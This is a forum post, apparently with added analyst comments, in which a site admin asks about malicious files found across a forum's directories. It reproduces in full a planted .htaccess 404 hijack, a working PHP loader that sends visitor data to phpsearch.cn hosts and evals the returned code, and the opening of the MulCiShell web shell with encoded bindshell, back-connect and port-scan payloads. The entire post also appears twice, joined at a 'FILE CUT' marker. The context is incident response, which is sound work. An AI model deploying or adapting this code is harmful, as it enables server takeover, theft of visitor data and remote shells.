ade_dnb
12-28-2008, 10:12 AM
I was doing a backup and about to do an upgrade when I came across these files but don't know where they came from.
In the forum root there are two files, 5725.php and mshell.php, plus an entry in the .htaccess. In the attachment folder I have the same 3 files, and in every other attachment folder; the same goes for customavatars, customprofilepics and signaturepics. mshell.php is always named the same, but the first file, 5725.php, is always a different string of numbers.
Has anybody come across these before? What are they, what are they supposed to do and what should I do about them?
.htaccess
# Planted alongside 5725.php: every 404 on the site is routed to the loader, so any
# request for a missing resource runs it with that visitor's headers. Both stanzas point
# at the same file (the first with a doubled leading slash). -MultiViews presumably stops
# Apache's content negotiation from resolving the request elsewhere first — confirm.
# Clean-up means removing these lines from every planted .htaccess (the post reports the
# same set in each attachment/avatar directory), not only the forum root, and restoring
# the site's own 404 handling.
Options -MultiViews
ErrorDocument 404 //forum/5725.php
Options -MultiViews
ErrorDocument 404 /forum/5725.php
5725.php
<? /*
 * Dropper / remote-code loader. The accompanying .htaccess registers this file as the
 * 404 handler, so a request for any missing resource executes it. error_reporting(0)
 * hides every failure from the visitor and from the error log.
 *
 * First block: collect the visitor's request metadata (host, server name, URI, script
 * name, query string, referer, User-Agent, client IP, script path, Accept-Language). The
 * $HTTP_* fallbacks cover register_globals-era PHP.
 */ error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
/* Every collected value is base64-encoded into the query string appended to the remote
 * URL below: visitor request data leaves the server on each hit, and the remote side can
 * presumably vary what it returns per visitor (referer, UA, language, IP). */
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
/* Remote host. The literal decodes to "phpsearch.cn"; combined with the prefixes below,
 * which decode to "http://ads2.", "http://7." and "http://71.", this gives three hostnames
 * to search for in proxy/egress logs. $f is reused here; the referer it held is already
 * inside $z. */
$f=base64_decode("cGhwc2VhcmNoLmNu");
/* Operator override: when the file is requested by its own name (not via the 404 handler)
 * and the `q` parameter hashes to the embedded md5, the `id` parameter replaces the remote
 * host, so the loader can be re-pointed without modifying the file on disk. */
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="ec0962378ef742df0bcf07a488bc5697") $f=$_REQUEST["id"];
/* Three fetch paths, each executing whatever the remote host returns as PHP: remote
 * include() (needs allow_url_include), file_get_contents()+eval() (needs allow_url_fopen),
 * and finally cURL+eval(). Turning off allow_url_include/allow_url_fopen removes only the
 * first two; the file itself has to go, in every directory it was dropped in. */
if((include(base64_decode("aHR0cDovL2FkczIu").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode ("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1) ;$o=curl_exec($cu);curl_close($cu);eval($o);};
/* die() ends the request here, so no normal 404 page is rendered after the hijacked handler. */ die( ); ?>
mshell.php
<?php
#/\/\/\/\/\ MulCiShell v0.2 /\/\/\/\/\/\/\#
# Updates from version 1.0#
# 1) Fixed MySQL insert function
# 2) Fixed trailing dirs
# 3) Fixed file-editing when set to 777
# 4) Removed mail function (who needs it?)
# 5) Re-wrote & improved interface
# 6) Added actions to entire directories
# 7) Added config+forum finder
# 8) Added MySQL dump function
# 9) Added DB+table creation, DB drop, table delete, and column+table count
# 10) Updated security-info feature to include more useful details
# 11) _Greatly_ Improved file browsing and handling
# 12) Added banner
# 13) Added DB-Parser and locator
# 14) Added enumeration function
# 15) Added common functions for bypassing security restrictions
# 16) Added bindshell & backconnect (needs testing)
# 17) Improved command execution (alts)
#/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/#
/* Web-shell prelude (MulCiShell v0.2, per the banner above): raise the memory ceiling,
 * stop runtime data from being auto-escaped by magic quotes, and start a session plus
 * output buffering. The '@' suppressions hide failures on hosts where ini_set is locked. */
@ini_set("memory_limit","256M");
@set_magic_quotes_runtime(0);
session_start();
ob_start();
$start=microtime();
// UI theme selected via ?theme= is stored in the session without validation.
if(isset($_GET['theme'])) $_SESSION['theme']=$_GET['theme'];
//Thanks korupt ;)
/* Base64-encoded C source (decoded text begins with "#include <asm/ioctls.h>"). Per banner
 * item 16 this is the bindshell payload; how it is written out or compiled is handled
 * later in the file, outside this excerpt. The decoded text is a usable file-scan signature. */
$backdoor_c="DQojaW5jbHVkZSA8YXNtL2lvY3Rscy5oPg0KI2luY2x1ZGUgPH N5cy90aW1lLmg+DQojaW5jbHVkZSA8c3lzL3NlbGVjdC5oPg0K I2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC 5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3Ry aW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlID xzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+ DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPH N0ZGludC5oPg0KI2luY2x1ZGUgPHB0aHJlYWQuaD4NCg0Kdm9p ZCAqQ2xpZW50SGFuZGxlcih2b2lkICpjbGllbnQpDQp7DQoJaW 50IGZkID0gKGludCljbGllbnQ7DQoJZHVwMihmZCwgMCk7DQoJ ZHVwMihmZCwgMSk7DQoJZHVwMihmZCwgMik7DQoJaWYoZm9yay gpID09IDApDQoJCWV4ZWNsKCIvYmluL2Jhc2giLCAicmVzbW9u IiwgMCk7DQoJY2xvc2UoZmQpOw0KCXJldHVybiAwOw0KfQ0KDQ ppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0K CWludCBtc29jaywgY3NvY2ssIGkgPSAxOw0KCXB0aHJlYWRfdC B0aHJlYWQ7DQoJc3RydWN0IHNvY2thZGRyIHNhZGRyOw0KCXN0 cnVjdCBzb2NrYWRkcl9pbiBzYWRkckluOw0KICAgIGludCBwb3 J0PWF0b2koYXJndlsxXSk7DQoJaWYoKG1zb2NrID0gc29ja2V0 KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkpID 09IC0xKQ0KCQlyZXR1cm4gLTE7DQoNCglzYWRkckluLnNpbl9m YW1pbHkJCT0gQUZfSU5FVDsNCglzYWRkckluLnNpbl9hZGRyLn NfYWRkcgk9IElOQUREUl9BTlk7DQoJc2FkZHJJbi5zaW5fcG9y dAkJPSBodG9ucyhwb3J0KTsNCiAgIA0KCW1lbWNweSgmc2FkZH IsICZzYWRkckluLCBzaXplb2Yoc3RydWN0IHNvY2thZGRyX2lu KSk7DQoJc2V0c29ja29wdChtc29jaywgU09MX1NPQ0tFVCwgU0 9fUkVVU0VBRERSLCAoY2hhciAqKSZpLCBzaXplb2YoaSkpOw0K IA0KCWlmKGJpbmQobXNvY2ssICZzYWRkciwgc2l6ZW9mKHNhZG RyKSkgIT0gMCl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJu IC0xOw0KCX0NCiANCglpZihsaXN0ZW4obXNvY2ssIDEwKSA9PS AtMSl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0K CX0NCiANCgl3aGlsZSgxKXsNCgkJaWYoKGNzb2NrID0gYWNjZX B0KG1zb2NrLCBOVUxMLCBOVUxMKSkgIT0gLTEpew0KCQkJcHRo cmVhZF9jcmVhdGUoJnRocmVhZCwgMCwgaGFuZGxlciwgKHZvaW QgKiljc29jayk7DQoJCX0NCgl9DQoJDQoJcmV0dXJuIDE7DQp9";
/* Base64-encoded Perl (decoded text begins "#!/usr/bin/perl" and uses Socket): the
 * back-connect payload named in banner item 16. */
$backconnect_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KbXkgKCRpYW RkciwkcG9ydCwkY21kKT1AQVJHVjsNCm15ICRwYWRkcj1zb2Nr YWRkcl9pbigkcG9ydCwgaW5ldF9hdG9uKCRpYWRkcikpOw0KbX kgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0Kc29j a2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm 90byk7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKTsNCm9wZW4o U1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERJTiwiPiZTT0 NLRVQiKTsNCnByaW50IFNPQ0tFVCAiU2hlbGwgdGVzdFxuIjsN CnByaW50IGV4ZWMoJGNtZCk7DQpjbG9zZShTVERJTik7DQpjbG 9zZShTVERPVVQpOw0K";
/* Base64-encoded Perl using IO::Socket::INET; appears to be a port-scanning helper
 * (the decoded text prints "Port open"). */
$pl_scan="DQoJIyEvdXNyL2Jpbi9wZXJsDQp1c2Ugd2FybmluZ3M7DQp1c2 Ugc3RyaWN0Ow0KdXNlIGRpYWdub3N0aWNzOw0KdXNlIElPOjpT b2NrZXQ6OklORVQ7DQpzdWIgdXNhZ2UNCnsNCglkaWUoIiQwIG hvc3Qgc3RhcnRwb3J0IGVuZHBvcnQKIik7DQp9DQp1c2FnZSB1 bmxlc3MoQEFSR1Y+MSk7DQpteSgkaG9zdCwkcywkZSk9QEFSR1 Y7DQpmb3JlYWNoKCRzLi4kZSkNCnsNCglteSAkc29jaz1JTzo6 U29ja2V0OjpJTkVULT5uZXcNCgkoDQoJCVBlZXJBZGRyPT4kaG 9zdCwNCgkJUGVlclBvcnQ9PiRfLA0KCQlQcm90bz0+J3RjcCcs DQoJCVRpbWVvdXQ9PjINCgkpOw0KCXByaW50ICJQb3J0ICBvcG VuCiIgaWYgKCRcc29jayk7DQp9DQoNCgk=";
/* The shell's own access gate is switched off (0). The credential, User-Agent and address
 * values below are presumably only enforced when it is on — the enforcing code is later in
 * the file, outside this excerpt — so as deployed, anyone who can reach the URL gets the shell. */
$access_control=0;
$md5_user="MulCiber";           // default login name
$md5_pass="123";                // default password; a literal, not a hash, despite the name
$user_agent="MulCiber";         // expected User-Agent; a useful search term in access logs for this family
$allowed_addrs=array('127.0.0.1');
$shell_email="mulciber-@hotmail.com";   // hard-coded author contact; indicator for this family
/* Environment the shell reports back: its own filename, caller IP, resolved server IP,
 * and the web-server banner. */
$self=basename($_SERVER['PHP_SELF']);
$addr=$_SERVER['REMOTE_ADDR'];
$serv=@gethostbyname($_SERVER['HTTP_HOST']);
$soft=$_SERVER['SERVER_SOFTWARE'];
==========FILE CUT=============
In the forum root there are two files, 5725.php and mshell.php, plus an entry in the .htaccess. In the attachment folder I have the same 3 files, and in every other attachment folder; the same goes for customavatars, customprofilepics and signaturepics. mshell.php is always named the same, but the first file, 5725.php, is always a different string of numbers.
Has anybody come across these before? What are they, what are they supposed to do and what should I do about them?
.htaccess
# Planted alongside 5725.php: every 404 on the site is routed to the loader, so any
# request for a missing resource runs it with that visitor's headers. Both stanzas point
# at the same file (the first with a doubled leading slash). -MultiViews presumably stops
# Apache's content negotiation from resolving the request elsewhere first — confirm.
# Clean-up means removing these lines from every planted .htaccess (the post reports the
# same set in each attachment/avatar directory), not only the forum root, and restoring
# the site's own 404 handling.
Options -MultiViews
ErrorDocument 404 //forum/5725.php
Options -MultiViews
ErrorDocument 404 /forum/5725.php
5725.php
<? /*
 * Dropper / remote-code loader. The accompanying .htaccess registers this file as the
 * 404 handler, so a request for any missing resource executes it. error_reporting(0)
 * hides every failure from the visitor and from the error log.
 *
 * First block: collect the visitor's request metadata (host, server name, URI, script
 * name, query string, referer, User-Agent, client IP, script path, Accept-Language). The
 * $HTTP_* fallbacks cover register_globals-era PHP.
 */ error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
/* Every collected value is base64-encoded into the query string appended to the remote
 * URL below: visitor request data leaves the server on each hit, and the remote side can
 * presumably vary what it returns per visitor (referer, UA, language, IP). */
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
/* Remote host. The literal decodes to "phpsearch.cn"; combined with the prefixes below,
 * which decode to "http://ads2.", "http://7." and "http://71.", this gives three hostnames
 * to search for in proxy/egress logs. $f is reused here; the referer it held is already
 * inside $z. */
$f=base64_decode("cGhwc2VhcmNoLmNu");
/* Operator override: when the file is requested by its own name (not via the 404 handler)
 * and the `q` parameter hashes to the embedded md5, the `id` parameter replaces the remote
 * host, so the loader can be re-pointed without modifying the file on disk. */
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="ec0962378ef742df0bcf07a488bc5697") $f=$_REQUEST["id"];
/* Three fetch paths, each executing whatever the remote host returns as PHP: remote
 * include() (needs allow_url_include), file_get_contents()+eval() (needs allow_url_fopen),
 * and finally cURL+eval(). Turning off allow_url_include/allow_url_fopen removes only the
 * first two; the file itself has to go, in every directory it was dropped in. */
if((include(base64_decode("aHR0cDovL2FkczIu").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode ("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1) ;$o=curl_exec($cu);curl_close($cu);eval($o);};
/* die() ends the request here, so no normal 404 page is rendered after the hijacked handler. */ die( ); ?>
mshell.php
<?php
#/\/\/\/\/\ MulCiShell v0.2 /\/\/\/\/\/\/\#
# Updates from version 1.0#
# 1) Fixed MySQL insert function
# 2) Fixed trailing dirs
# 3) Fixed file-editing when set to 777
# 4) Removed mail function (who needs it?)
# 5) Re-wrote & improved interface
# 6) Added actions to entire directories
# 7) Added config+forum finder
# 8) Added MySQL dump function
# 9) Added DB+table creation, DB drop, table delete, and column+table count
# 10) Updated security-info feature to include more useful details
# 11) _Greatly_ Improved file browsing and handling
# 12) Added banner
# 13) Added DB-Parser and locator
# 14) Added enumeration function
# 15) Added common functions for bypassing security restrictions
# 16) Added bindshell & backconnect (needs testing)
# 17) Improved command execution (alts)
#/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/#
/* Web-shell prelude (MulCiShell v0.2, per the banner above): raise the memory ceiling,
 * stop runtime data from being auto-escaped by magic quotes, and start a session plus
 * output buffering. The '@' suppressions hide failures on hosts where ini_set is locked. */
@ini_set("memory_limit","256M");
@set_magic_quotes_runtime(0);
session_start();
ob_start();
$start=microtime();
// UI theme selected via ?theme= is stored in the session without validation.
if(isset($_GET['theme'])) $_SESSION['theme']=$_GET['theme'];
//Thanks korupt ;)
/* Base64-encoded C source (decoded text begins with "#include <asm/ioctls.h>"). Per banner
 * item 16 this is the bindshell payload; how it is written out or compiled is handled
 * later in the file, outside this excerpt. The decoded text is a usable file-scan signature. */
$backdoor_c="DQojaW5jbHVkZSA8YXNtL2lvY3Rscy5oPg0KI2luY2x1ZGUgPH N5cy90aW1lLmg+DQojaW5jbHVkZSA8c3lzL3NlbGVjdC5oPg0K I2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC 5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3Ry aW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlID xzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+ DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPH N0ZGludC5oPg0KI2luY2x1ZGUgPHB0aHJlYWQuaD4NCg0Kdm9p ZCAqQ2xpZW50SGFuZGxlcih2b2lkICpjbGllbnQpDQp7DQoJaW 50IGZkID0gKGludCljbGllbnQ7DQoJZHVwMihmZCwgMCk7DQoJ ZHVwMihmZCwgMSk7DQoJZHVwMihmZCwgMik7DQoJaWYoZm9yay gpID09IDApDQoJCWV4ZWNsKCIvYmluL2Jhc2giLCAicmVzbW9u IiwgMCk7DQoJY2xvc2UoZmQpOw0KCXJldHVybiAwOw0KfQ0KDQ ppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0K CWludCBtc29jaywgY3NvY2ssIGkgPSAxOw0KCXB0aHJlYWRfdC B0aHJlYWQ7DQoJc3RydWN0IHNvY2thZGRyIHNhZGRyOw0KCXN0 cnVjdCBzb2NrYWRkcl9pbiBzYWRkckluOw0KICAgIGludCBwb3 J0PWF0b2koYXJndlsxXSk7DQoJaWYoKG1zb2NrID0gc29ja2V0 KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkpID 09IC0xKQ0KCQlyZXR1cm4gLTE7DQoNCglzYWRkckluLnNpbl9m YW1pbHkJCT0gQUZfSU5FVDsNCglzYWRkckluLnNpbl9hZGRyLn NfYWRkcgk9IElOQUREUl9BTlk7DQoJc2FkZHJJbi5zaW5fcG9y dAkJPSBodG9ucyhwb3J0KTsNCiAgIA0KCW1lbWNweSgmc2FkZH IsICZzYWRkckluLCBzaXplb2Yoc3RydWN0IHNvY2thZGRyX2lu KSk7DQoJc2V0c29ja29wdChtc29jaywgU09MX1NPQ0tFVCwgU0 9fUkVVU0VBRERSLCAoY2hhciAqKSZpLCBzaXplb2YoaSkpOw0K IA0KCWlmKGJpbmQobXNvY2ssICZzYWRkciwgc2l6ZW9mKHNhZG RyKSkgIT0gMCl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJu IC0xOw0KCX0NCiANCglpZihsaXN0ZW4obXNvY2ssIDEwKSA9PS AtMSl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0K CX0NCiANCgl3aGlsZSgxKXsNCgkJaWYoKGNzb2NrID0gYWNjZX B0KG1zb2NrLCBOVUxMLCBOVUxMKSkgIT0gLTEpew0KCQkJcHRo cmVhZF9jcmVhdGUoJnRocmVhZCwgMCwgaGFuZGxlciwgKHZvaW QgKiljc29jayk7DQoJCX0NCgl9DQoJDQoJcmV0dXJuIDE7DQp9";
/* Base64-encoded Perl (decoded text begins "#!/usr/bin/perl" and uses Socket): the
 * back-connect payload named in banner item 16. */
$backconnect_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KbXkgKCRpYW RkciwkcG9ydCwkY21kKT1AQVJHVjsNCm15ICRwYWRkcj1zb2Nr YWRkcl9pbigkcG9ydCwgaW5ldF9hdG9uKCRpYWRkcikpOw0KbX kgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0Kc29j a2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm 90byk7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKTsNCm9wZW4o U1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERJTiwiPiZTT0 NLRVQiKTsNCnByaW50IFNPQ0tFVCAiU2hlbGwgdGVzdFxuIjsN CnByaW50IGV4ZWMoJGNtZCk7DQpjbG9zZShTVERJTik7DQpjbG 9zZShTVERPVVQpOw0K";
/* Base64-encoded Perl using IO::Socket::INET; appears to be a port-scanning helper
 * (the decoded text prints "Port open"). */
$pl_scan="DQoJIyEvdXNyL2Jpbi9wZXJsDQp1c2Ugd2FybmluZ3M7DQp1c2 Ugc3RyaWN0Ow0KdXNlIGRpYWdub3N0aWNzOw0KdXNlIElPOjpT b2NrZXQ6OklORVQ7DQpzdWIgdXNhZ2UNCnsNCglkaWUoIiQwIG hvc3Qgc3RhcnRwb3J0IGVuZHBvcnQKIik7DQp9DQp1c2FnZSB1 bmxlc3MoQEFSR1Y+MSk7DQpteSgkaG9zdCwkcywkZSk9QEFSR1 Y7DQpmb3JlYWNoKCRzLi4kZSkNCnsNCglteSAkc29jaz1JTzo6 U29ja2V0OjpJTkVULT5uZXcNCgkoDQoJCVBlZXJBZGRyPT4kaG 9zdCwNCgkJUGVlclBvcnQ9PiRfLA0KCQlQcm90bz0+J3RjcCcs DQoJCVRpbWVvdXQ9PjINCgkpOw0KCXByaW50ICJQb3J0ICBvcG VuCiIgaWYgKCRcc29jayk7DQp9DQoNCgk=";
/* The shell's own access gate is switched off (0). The credential, User-Agent and address
 * values below are presumably only enforced when it is on — the enforcing code is later in
 * the file, outside this excerpt — so as deployed, anyone who can reach the URL gets the shell. */
$access_control=0;
$md5_user="MulCiber";           // default login name
$md5_pass="123";                // default password; a literal, not a hash, despite the name
$user_agent="MulCiber";         // expected User-Agent; a useful search term in access logs for this family
$allowed_addrs=array('127.0.0.1');
$shell_email="mulciber-@hotmail.com";   // hard-coded author contact; indicator for this family
/* Environment the shell reports back: its own filename, caller IP, resolved server IP,
 * and the web-server banner. */
$self=basename($_SERVER['PHP_SELF']);
$addr=$_SERVER['REMOTE_ADDR'];
$serv=@gethostbyname($_SERVER['HTTP_HOST']);
$soft=$_SERVER['SERVER_SOFTWARE'];
==========FILE CUT=============